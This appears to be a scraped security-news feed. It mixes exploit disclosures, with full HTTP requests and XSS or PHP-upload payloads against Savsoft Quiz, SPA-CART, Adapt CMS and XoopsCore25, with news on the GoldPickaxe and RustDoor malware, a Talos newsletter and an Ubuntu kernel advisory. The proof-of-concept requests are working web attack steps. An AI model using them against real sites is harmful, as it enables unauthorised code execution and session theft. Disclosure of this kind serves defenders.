Savsoft Quiz version 6.0 Enterprise suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting# Date: 2024-01-03# Exploit Author: Eren Sen# Vendor: SAVSOFT QUIZ# Vendor Homepage: https://savsoftquiz.com# Software Link: https://savsoftquiz.com/web/index.php/online-demo/# Version: < 6.0# CVE-ID: N/A# Tested on: Kali Linux / Windows 10# Vulnerabilities Discovered Date : 2024/01/03# Persistent Cross Site Scripting (XSS) Vulnerability# Vulnerable Parameter Type: POST# Vulnerable Parameter: quiz_name# Proof of Concepts:https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13# HTTP Request:POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1Host: demos1.softaculous.comCookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxxContent-Length: 411Cache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Origin: https://demos1.softaculous.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closequiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

Savsoft Quiz 6.0 Enterprise Cross Site Scripting

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

A group of cybercriminals is committing bank fraud by convincing victims to scan their IDs and faces.

Well, the GoldPickaxe Trojan does not literally steal your face, but it does steal an image of your face in order to be able to identify as you.

Researchers have found a family of Trojans, attributed to a financially motivated Chinese group, which come in versions for iOS and Android.

Cybercriminals try to trick victims into scanning their faces along with identification documents. The victims are approached through phishing and smishing messages claiming to be from local governments or other trusted sources. They ask the target to install a fake government service app.

At this stage there is a crossroads where Android and iOS infections are different. While Android users go straight to the malicious app, due to measures taken by Apple the criminals ask the iOS users to install a disguised Mobile Device Management (MDM) profile. MDM allows a controller to remotely configure devices by sending profiles and commands to the device. As such MDM offers a wide range of features such as remote wipe, device tracking, and application management, which the cybercriminals take advantage of to install malicious applications and obtain the information they need.

The criminals then request that the victim take a photo of an official ID and scan their face with the app. Additionally, the criminals request the target’s phone number in order to get more details about them, particularly their bank accounts.

Once the criminals have a scan of the face they can use artificial intelligence (AI) to perform face-swaps. Face swapping is a technique that allows you to replace faces in images with others.

With the face swap and the photo of the ID the criminals can identify themselves as the victim to the victim’s bank and withdraw funds from their account. Many financial organizations use facial recognition for transaction verification and login authentication. Although the researchers found no evidence that bank fraud was the goal of the cybercriminals, their story was confirmed by warnings from the Thai police.

Although this group is mainly active in Asia, more precisely in Thailand, it makes sense to expect such a successful method to be copied.

Malwarebytes and ThreatDown solutions detect the GoldPickaxe Trojan as Android/Trojan.Agent.prn1.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 GoldPickaxe Trojan steals your face! 

Several companies operating in the cryptocurrency sector are the target of a newly discovered Apple macOS backdoor codenamed RustDoor.
RustDoor was first documented by Bitdefender last week, describing it as a Rust-based malware capable of harvesting and uploading files, as well as gathering information about the infected machines. It's distributed by masquerading itself as a Visual

RustDoor macOS Backdoor Targets Cryptocurrency Firms with Fake Job Offers

There was about a 24-hour period where many news outlets reported on a reported DDoS attack that involved a botnet made up of thousands of internet-connected toothbrushes.

Thursday, February 15, 2024 14:00

I’ll be the first to admit that, like many people on the internet last week, I got caught up in the toothbrush distributed denial-of-service attack that wasn’t.  

I had a whole section on it written up in last week’s newsletter, and then I came across Graham Cluley’s blog post debunking the whole thing, and I had to delete it about an hour before the newsletter went live.  

There was about a 24-hour period where many news outlets reported on a reported DDoS attack that involved a botnet made up of thousands of internet-connected toothbrushes, it all started with one international newspaper report, and then was aggregated to death and spread quickly on social media.  

This attack was only a _hypothetical_ that a security researcher posed in an interview but was reported or translated as an attack that happened. 

To me, I think we can all learn from a few major takeaways from this entire saga — myself included.  

It’s easy to see why this was a ready-made story to go viral: It involved a silly device that probably doesn’t need to be connected to the internet anyway, it involved a large number that would grab headlines and it was a DDoS attack, which have suddenly come back in vogue over the past year. 

But, I’ll admit, the aggregated stories seemed a little fishy to me at first, because all the reports didn’t include any specifics about which company was targeted, how long the attack lasted, or the name of the device that was reportedly compromised. 

That last part should be a red flag going forward for any of us wanting to share a meme about something the next time a cybersecurity story goes viral — in my opinion, responsible disclosure of an attack or compromise should always include information about whatever vulnerability it was that was exploited. In this hypothetical scenario, I don’t think an adversary would have been able to compromise an internet-connected toothbrush without first exploiting some sort of vulnerability, which if it’s being reported on in public, should at least include information on patches or mitigations. 

I also think we all need to be asking the fundamental question: Why? In this case, I should have asked myself why an attacker would want to go through the trouble of compromising smart toothbrushes. And what would be the end goal of targeting a private company with a DDoS attack? Likely, it would be to demand a ransom in exchange for the attacker stopping the attack, but without knowing what sector the targeted company was in, it’s tough to guess how profitable that might even be. (For example, a health care agency may be looking to do anything to get back to operating asap, as lives could literally be at stake.) 

And once the attacker compromised a toothbrush, what information can they glean from the user besides their dental hygiene habits? Usually, they’d be looking to steal some sort of personal information, login credentials or financial data that they could then turn around and sell on the dark web. 

Needless to say, there were multiple red flags we all ignored when this story started to spread. And I’m not here to blame anyone in this case; it was all honest mistakes that, all things considered, ended up not being that serious. But the toothbrush botnet that wasn’t does serve as a reminder to all of us to be a bit more mindful before clicking share or posting a story on social media.  

**The one big thing **

Cisco Talos has identified a new backdoor authored and operated by the Turla APT group, a Russian cyber espionage threat group. This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation. Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems. 

**Why do I care? **

Turla has been widely known to target entities across the world using a huge set of offensive tools in geographies including the U.S., European Union, Ukraine and Asia. They’ve previously used malware families such as CAPIBAR and KAZUAR to target Ukrainian defense forces. After Crutch and TinyTurla, Turla has now expanded their arsenal to include the TinyTurla-NG and TurlaPower-NG malware families, while also widening its net of targets to NGOs. 

**So now what? **

Talos has released new ClamAV signatures and Snort rules to protect against TinyTurla and the actors’ actions. We don’t know what the initial access vector is, so it’s tough to give targeted advice on how to avoid this malware, but having any endpoint detection in place will block this “last chance” backdoor.  

**Top security headlines of the week **

**Chinese state-sponsored actor Volt Typhoon may have silently sat on U.S. critical infrastructure networks for more than five years,** according to a new report from American intelligence agencies. According to the advisory, the infamous hacking group has been exploiting vulnerabilities in routers, firewalls and VPNs to target water, transportation, energy and communications systems across the country. Volt Typhoon has been able to control some victims’ surveillance camera systems, and the access could have allowed them to disrupt critical energy and water controls. The actor is known for using living-off-the-land binaries (LoLBins) to remain undetected once they gain an initial foothold. Authorities in Canada, Australia and New Zealand also contributed to last week’s advisory, citing their concern for similar activity in their countries. The FBI’s director recently said in testimony to U.S. Congress that authorities had dismantled a bot network of hundreds of compromised devices that was connected to VoltTyphoon. (Axios, The Guardian) 

**A new spyware network called TheTruthSpy may have compromised hundreds of Android devices using silent tracking apps that users download thinking they’re legitimate.** Security researchers uncovered the information of thousands of devices that have already been compromised, including their IMEI numbers and advertising IDs. TheTruthSpy appears to actively spy on large clusters of victims across Europe, India, Indonesia, the U.S. and U.K. The operators behind TheTruthSpy also did not address a security vulnerability in the software, identified as CVE-2022-0732, which left the victim data they stole potentially vulnerable to other bad actors. These types of stalkerware tools are often used by family members, spouses or peers of victims who want to track their physical locations and spy on messages and phone calls. The spyware is downloaded via an app, which doesn’t appear on the victim’s home screen and operates quietly in the background. (TechCrunch, maia blog) 

**Apple removed a fake LastPass app called “LassPass” after the popular password management service reported it.** The phony LassPass used a similar logo to that of the legitimate LastPass and was up on the App Store for an unknown amount of time. Apple also said it was removing the creator of the app from its Developer Program. This is a very rare case for the Apple App Store, as it has a strict review policy. LastPass released a warning to all users last week of the fake app’s existence, including a link to the legitimate LastPass app. LassPass only had one review on the store, and multiple reviews warning it was fake. However, it’s safe to assume that the app was likely set up as some sort of phishing scam meant to get users to enter their legitimate LastPass login information to be stolen by the fake app’s creator. (Ars Technica, Bleeping Computer) 

**Can’t get enough Talos? **

*   Beers with Talos Ep. #143: The Reddit security diaries 
*   The Need to Know: How are attackers using QR codes in phishing emails and lure documents? 
*   First Microsoft Patch Tuesday zero-day of 2024 disclosed as part of group of 75 vulnerabilities 

**Upcoming events where you can find Talos **

**S4x24** **(March 4 - 27)** 

Miami Beach, Florida 

_To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine._ 

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1      
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515      
**Typical Filename:** IMG001.exe      
**Claimed Product:** N/A      
**Detection Name:** Win.Dropper.Coinminer::1201 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** tmp000c3787   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg

Why the toothbrush DDoS story fooled us all

Ubuntu Security Notice 6639-1 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    =========================================================================Ubuntu Security Notice USN-6639-1February 15, 2024linux-oem-6.1 vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the AppleTalk networkingsubsystem of the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-51781)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)Alon Zahavi discovered that the NVMe-oF/TCP subsystem of the Linux kerneldid not properly handle connect command payloads in certain situations,leading to an out-of-bounds read vulnerability. A remote attacker could usethis to expose sensitive information (kernel memory). (CVE-2023-6121)Jann Horn discovered that a race condition existed in the Linux kernel whenhandling io_uring over sockets, leading to a use-after-free vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6531)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle dynset expressions passed from userspace, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash). (CVE-2023-6622)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Robert Morris discovered that the CIFS network file system implementationin the Linux kernel did not properly validate certain server commandsfields, leading to an out-of-bounds read vulnerability. An attacker coulduse this to cause a denial of service (system crash) or possibly exposesensitive information. (CVE-2024-0565)Dan Carpenter discovered that the netfilter subsystem in the Linux kerneldid not store data in properly sized memory locations. A local user coulduse this to cause a denial of service (system crash). (CVE-2024-0607)Jann Horn discovered that the TLS subsystem in the Linux kernel did notproperly handle spliced messages, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2024-0646)Yang Chaoming discovered that the KSMBD implementation in the Linux kerneldid not properly validate request buffer sizes, leading to an out-of-boundsread vulnerability. An attacker could use this to cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2024-22705)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  linux-image-6.1.0-1033-oem      6.1.0-1033.33  linux-image-oem-22.04           6.1.0.1033.34  linux-image-oem-22.04a          6.1.0.1033.34  linux-image-oem-22.04b          6.1.0.1033.34  linux-image-oem-22.04c          6.1.0.1033.34After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6639-1  CVE-2023-51780, CVE-2023-51781, CVE-2023-51782, CVE-2023-6121,  CVE-2023-6531, CVE-2023-6622, CVE-2023-6932, CVE-2024-0565,  CVE-2024-0607, CVE-2024-0646, CVE-2024-22705Package Information:  https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1033.33

Ubuntu Security Notice USN-6639-1

By Deeba Ahmed
This is the first instance of an iOS trojan that has been found stealing facial data from victims.
This is a post from HackRead.com Read the original post: New iOS Trojan “GoldPickaxe” Steals Facial Recognition Data

Beware, as a new iOS trojan dubbed GoldPickaxe has emerged, capable of stealing banking data, ID documents, and even facial data from infected devices.

Group-IB has discovered a new iOS Trojan, dubbed GoldPickaxe.iOS designed to steal facial recognition data, identity documents, and intercept SMS. The company’s Threat Intelligence Unit has attributed the entire threat cluster to a threat actor dubbed GoldFactory.

The GoldPickaxe family has been active since mid-2023, targeting the Asia-Pacific region, specifically Thailand and Vietnam and the attack method involves impersonating local banks and government organizations.

As per Group-IB, the threat actor exploits stolen biometric data using AI-driven face-swapping services to create deepfakes, allowing unauthorized access to a victim’s banking account, which is a new monetary theft technique.

In this campaign, GoldFactory has successfully used Mobile Device Management (MDM) to manipulate Apple devices, distributing its iOS Trojan by abusing TestFlight. Victims receive seemingly innocent URLs (e.g. testflight.apple.com/join/) leading to the installation of malicious software.

Another sophisticated method is tricking victims into interacting with fraudulent websites to install an MDM profile, allowing cybercriminals complete control over the victim’s device.

Thailand Banking Sector CERT (TB-CERT) has also reported that cybercriminals are distributing malicious links via messengers to lure victims into a fraudulent app posing as a ‘Digital Pension’ app. The app’s credibility is doubtful as Group-IB’s investigation confirmed multiple versions of GoldPickaxe impersonating official Thai government services, including the Digital Pension app for Thailand.

Researchers believe that the group may be engaging operators proficient in Thai and Vietnamese or possibly running a call center since an SMS written in Thai was found in the phishing campaign. In Thailand, cybercriminals impersonate government authorities and convince victims to use LINE, a popular messaging application.

According to Group-IB’s blog post, the gang reportedly employs a combination of smishing and phishing techniques to carry out their malicious activities in Vietnam and Thailand. Despite evidence that it is a Chinese-speaking group, the involvement/role of local cybercriminals cannot be ruled out when calls made to victims are examined.

It is worth noting that Group-IB previously discovered an Android Trojan, codenamed GoldDigger, stealing facial data, targeting over 50 Vietnamese banking applications, electronic wallets, and cryptocurrency wallets since June 2023.

GoldDigger stealing facial data from Android devices (Group-IB)

The newly discovered GoldPickaxe family is based on the GoldDigger Android Trojan. However, researchers claim the infection chain for GoldPickaxe iOS variants is not significantly different for other Trojans within the GoldFactory family.

GoldPickaxe malware was developed using the same communication mechanism and cloud bucket URL as GoldDigger but has fewer functionalities compared to its Android sibling due to iOS’s closed nature and stricter permissions.

Both versions use fake login pages to access fake Digital pension applications, potentially avoiding detection. Another variant, GoldDiggerPlus, was also identified with extended GoldDigger’s functionality, allowing real-time call calls through a specially designed APK called GoldKefu. All Trojans identified are currently in the active stage of evolution.

“_Overall, we identified four Trojan families that were used by cybercriminals. We maintained the naming convention by using the prefix Gold for the newly discovered malware as a symbolic representation that they have been developed by the same threat actor_,” Group-IB researchers noted.

Researchers couldn’t identify the toolset GoldFactory uses, indicating that this is a highly organized and technically advanced group.

For your information, in March 2023, the Bank of Thailand mandated facial biometric verification for transactions exceeding 50,000 baht, and 200,000 baht per day, and raised credit transfer limits on mobile devices. As per Group-IB’s research, GoldPickaxe likely reached Vietnam in February 2024 when a Vietnamese citizen performed a facial recognition scan, withdrawing over 40,000 USD.

The State Bank of Vietnam plans to mandate facial authentication as a security measure for all money transfers from April 2024, indicating the potential exploitation of GoldPickaxe in the country. The use of GoldPickaxe in Vietnam is expected to increase assessed Group—IB.

_“GoldFactory is a resourceful team, having many tricks up their sleeve: impersonation, accessibility keylogging, fake banking websites, fake bank alerts, fake call screens, identity and facial recognition data collection. Equipped with diverse tools, they have the flexibility to select and execute the most suitable one that fits the scenario,”_ researchers noted.

The report highlights the growing cybersecurity threat and the sophisticated techniques used by cybercriminals. They have refined GoldDigger malware, introduced new categories for facial recognition data harvesting, and developed a tool for communication between victims and cybercriminals. Group-IB researchers emphasize the need for proactive, multi-faceted cybersecurity measures, including user education.

1.  **Kaspersky’s iShutdown Tool Detects iOS Pegasus Spyware**
2.  **Fake Lockdown Mode Exposes iOS Users to Malware Attacks**
3.  **Fake LastPass Password Manager App Lurks on iOS App Store**
4.  **Bitdefender Introduces GravityZone Security for Android and iOS**
5.  **Zero-Day iOS Exploit Chain Infects Devices with Predator Spyware**

New iOS Trojan “GoldPickaxe” Steals Facial Recognition Data

Adapt CMS version 3.0.3 suffers from persistent cross site scripting and remote shell upload vulnerabilities.

# Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3  
# Date: 02/2024  
# Exploit Author: Andrey Stoykov  
# Version: 3.0.3  
# Tested on: Ubuntu 22.04  
# Blog: http://msecureltd.blogspot.com

 *Description*

- It was found that adaptcms v3.0.3 was vulnerable to stored cross  
site scripting

- Also the application allowed the file upload functionality to upload  
PHP files which resulted in remote code execution

*Stored XSS*

*Steps to Reproduce:*

   1. Login as admin and add a new article  
   2. In "Title" add the following payload <svg><animate  
onbegin=alert(1) attributeName=x dur=1s>  
   3. The stored XSS would be triggered upon visiting the article by  
normal user

// HTTP POST request

POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1

Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

_method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&*data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E*&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...]

// HTTP GET request

GET /adaptcms/admin/articles/preview HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
[...]

[...]  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  *<title>*  
*    AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x  
dur=1s>  </title>*  
[...]

*Unrestricted File Upload*

*Steps to Reproduce:*

   1. Login as admin and visit the "Media" page  
   2. Click on "Files" then use the "Add File" functionality  
   3. In "File Contents" add the following PHP code <?php phpinfo(); ?>

// HTTP POST request

POST /adaptcms/admin/files/add HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

[...]  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[0][File][dir]"*

*uploads/*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][mimetype]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][filesize]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[File][content]"*

*<?php phpinfo(); ?>*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
[...]

// HTTP response

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
*Location: http://192.168.232.133/adaptcms/admin/files  
<http://192.168.232.133/adaptcms/admin/files>*  
[...]

// HTTP GET request

GET /adaptcms/uploads/*test-php.php* HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

[...]  
<h1 class="p">*PHP Version 5.6.40*</h1>  
</td></tr>  
</table>  
<table>  
<tr><td class="e">System </td><td class="v">*Linux ubuntu  
6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12  
18:54:30 UTC 2 x86_64* </td></tr>  
[...]

Adapt CMS 3.0.3 Cross Site Scripting / Shell Upload

XoopsCore25 version 2.5.11 suffers from a cross site scripting vulnerability.

    ## Title: XoopsCore25-2.5.11-XSS-Reflected## Author: nu11secur1ty## Date: 02/12/2024## Vendor: https://xoops.org/## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected## Description:The value of the yname request parameter is copied into the value ofan HTML tag attribute which is encapsulated in single quotation marks.The payload '>333< was submitted in the yname parameter. This inputwas echoed unmodified in the application's response. The attacker cantrick the user to visit very dangerous and malicious URL in thissessionSTATUS: HIGH Vulnerability[+]Exploit execution:```POSTPOST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160Safari/537.36Connection: closeCache-Control: max-age=0Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmnOrigin: https://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563Content-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 148yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)## Time spent:01:17:00

XoopsCore25 2.5.11 Cross Site Scripting

Complaint Management System version 2.0 suffers from multiple remote SQL injection vulnerabilities.

